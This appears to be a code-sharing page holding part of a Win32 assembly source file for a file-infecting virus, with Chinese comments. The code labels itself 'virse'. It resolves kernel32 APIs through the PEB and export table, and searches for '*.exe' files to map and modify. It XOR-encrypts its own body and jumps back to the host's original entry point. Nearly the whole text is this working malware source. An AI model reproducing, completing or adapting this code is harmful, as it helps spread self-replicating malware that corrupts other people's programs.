📄 test.asm
字号:
;---------------------
push eax
call [ebp + _CloseHandle]
ret
CloseH endp
GetProcAddress proc
;----------参数
;eax
;----------------
add eax,ebp
push eax
push dword ptr [ebp + hDll]
call [ebp + _GetProcAddressA]
cmp eax,0
jz toOldEntry
ret
GetProcAddress endp
LoadApis proc ;查找kernel32.dll镜像地址 ,载入Api函数地址
pushad
xor eax,eax
assume fs: fs
mov eax,FS:[eax + 30h]
test eax,eax
js kernel9x
kernelnt:
mov eax,[eax + 0ch]
mov esi,[eax + 1ch]
lodsd
mov eax,[eax + 08h]
jmp found
kernel9x:
mov eax,[eax + 34h]
lea eax,[eax + 7ch]
mov eax,[eax + 3ch]
found:
;获取GetProcAddressA地址
mov [ebp + hDll],eax
add eax,dword ptr [eax + 3ch] ;eax ->PE
mov eax,dword ptr [eax + 78h]
add eax,[ebp + hDll] ;eax->IED
mov [ebp + IED],eax
mov ecx,[eax + 14h] ;numberofnames
mov eax,[eax + 20h] ;edi ->NameTable
add eax,[ebp + hDll]
xor edx,edx
cld
loopGpa: push ecx
mov ecx,0eh
mov esi,[eax]
add esi,[ebp + hDll]
mov edi,offset szGetProcAddressA
add edi,ebp
repe cmpsb
cmp ecx,0
jz got
pop ecx
add eax,4
inc edx
loop loopGpa
popad
xor eax,eax
ret
got:
pop ecx
mov edi,[ebp + IED]
mov eax,[edi + 24h]
add eax,[ebp + hDll] ;edi->NameOrdinals
shl edx,1
add eax,edx
movzx edx,word ptr [eax]
shl edx,2
mov eax,[edi + 1ch]
add eax,[ebp + hDll] ;esi->AddrOfFunctions
mov eax,[eax + edx]
add eax,[ebp + hDll]
mov [ebp + _GetProcAddressA],eax ;save GetProcAddressA
GetApis:
mov eax,offset szExitProcess ;0
call GetProcAddress
mov [ebp + _ExitProcess],eax
mov eax,offset szLoadLibraryA ;1
call GetProcAddress
mov [ebp + _LoadLibraryA],eax
mov eax,offset szGetWindowsDirectoryA ;2
call GetProcAddress
mov [ebp + _GetWindowsDirectoryA],eax
mov eax,offset szGetSystemDirectoryA ;3
call GetProcAddress
mov [ebp + _GetSystemDirectoryA],eax
mov eax,offset szGetCurrentDirectoryA ;4
call GetProcAddress
mov [ebp + _GetCurrentDirectoryA],eax
mov eax,offset szSetCurrentDirectoryA ;5
call GetProcAddress
mov [ebp + _SetCurrentDirectoryA],eax
mov eax,offset szFindFirstFileA ;6
call GetProcAddress
mov [ebp + _FindFirstFileA],eax
mov eax,offset szFindNextFileA ;7
call GetProcAddress
mov [ebp + _FindNextFileA],eax
mov eax,offset szFindClose ;8
call GetProcAddress
mov [ebp + _FindClose],eax
mov eax,offset szCreateFileA ;9
call GetProcAddress
mov [ebp + _CreateFileA],eax
mov eax,offset szCreateFileMapping ;10
call GetProcAddress
mov [ebp + _CreateFileMapping],eax
mov eax,offset szMapViewOfFile ;11
call GetProcAddress
mov [ebp + _MapViewOfFile],eax
mov eax,offset szUnmapViewOfFile ;12
call GetProcAddress
mov [ebp + _UnmapViewOfFile],eax
mov eax,offset szCloseHandle ;13
call GetProcAddress
mov [ebp + _CloseHandle],eax
mov eax,offset szFreeLibrary ;14
call GetProcAddress
mov [ebp + _FreeLibrary],eax
mov eax,offset szGetModuleHandleA ;15
call GetProcAddress
mov [ebp + _GetModuleHandleA],eax
popad
or eax,00ff00ffh
ret
LoadApis endp
Display:
jmp toOldEntry
toOldEntry: ;跳到原程序入口
db 0e9h
dd offset rt - offset toOldEntry - 5
;------------------------------------------
;变量及常量
hDll label dword
dd ?
IED label dword
dd ?
nCounte label dword
dd 0
szUser32 db 'user32.dll'
szMsg db 'Virse run up!!',0
_ApisList label byte ;API函数地址表
_ExitProcess label dword
dd 0
_GetProcAddressA label dword
dd 0
_LoadLibraryA label dword
dd 0
_GetWindowsDirectoryA label dword
dd 0
_GetSystemDirectoryA label dword
dd 0
_GetCurrentDirectoryA label dword
dd 0
_SetCurrentDirectoryA label dword
dd 0
_FindFirstFileA label dword
dd 0
_FindNextFileA label dword
dd 0
_FindClose label dword
dd 0
_CreateFileA label dword
dd 0
_CreateFileMapping label dword
dd 0
_MapViewOfFile label dword
dd 0
_UnMapViewOfFile label dword
dd 0
_CloseHandle label dword
dd 0
_FreeLibrary label dword
dd 0
_MessageBoxA label dword
dd 0
_GetModuleHandleA label dword
dd 0
;------------------------------------------
szApis label byte
szGetProcAddressA db 'GetProcAddress',0
szExitProcess db 'ExitProcess',0
szLoadLibraryA db 'LoadLibraryA',0
szGetWindowsDirectoryA db 'GetWindowsDirectoryA',0
szGetSystemDirectoryA db 'GetSystemDirectoryA',0
szGetCurrentDirectoryA db 'GetCurrentDirectoryA',0
szSetCurrentDirectoryA db 'SetCurrentDirectoryA',0
szFindFirstFileA db 'FindFirstFileA',0
szFindNextFileA db 'FindNextFileA',0
szFindClose db 'FindClose',0
szCreateFileA db 'CreateFileA',0
szCreateFileMapping db 'CreateFileMappingA',0
szMapViewOfFile db 'MapViewOfFile',0
szUnmapviewOfFile db 'UnmapViewOfFile',0
szCloseHandle db 'CloseHandle',0
szFreeLibrary db 'FreeLibrary',0
szGetModuleHandleA db 'GetModuleHandleA',0
szMessageBoxA db 'MessageBoxA',0
win32_find_data dd 0
dd 2 dup(0)
dd 2 dup(0)
dd 2 dup(0)
dwFileSizeHigh dd 0
dwFileSizeLow label dword
dd 0
dd 0
dd 0
cFileName db 260 dup (0)
db 14 dup(0)
szExe db '*.exe',0
hFind label dword ;查询句柄
dd 0
bufDir label byte ;目录路径缓存
db 260 dup(0)
hFile label dword ;文件句柄
dd 0
hMapFile label dword ;映射句柄
dd 0
ImageBase label dword ;
dd 0
NewEntry label dword
dd 0
OldEntry label dword
dd 0
isExe label word
dw 0
decDataEnd:
Encrypt proc ;加密函数
;-------------------------
;esi写入病毒代码地址
;-------------------------
mov edi,esi
mov eax,offset decDataEnd - offset virse_start
mov ecx,4
xor edx,edx
div ecx
dec ecx
mov ecx,eax
cld
repxor:
lodsd
xor eax,12345678h
stosd
loop repxor
ret
Encrypt endp
deccode:
call Relocate
mov esi,offset virse_start
add esi,ebp
call Encrypt
jmp Prepare
Relocate proc
call R
R:
pop ebp
sub ebp,offset R
ret
Relocate endp
;------------------------------------------
virse_end:
rt:
push 00000000h
call [ebp + _ExitProcess]
end start⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -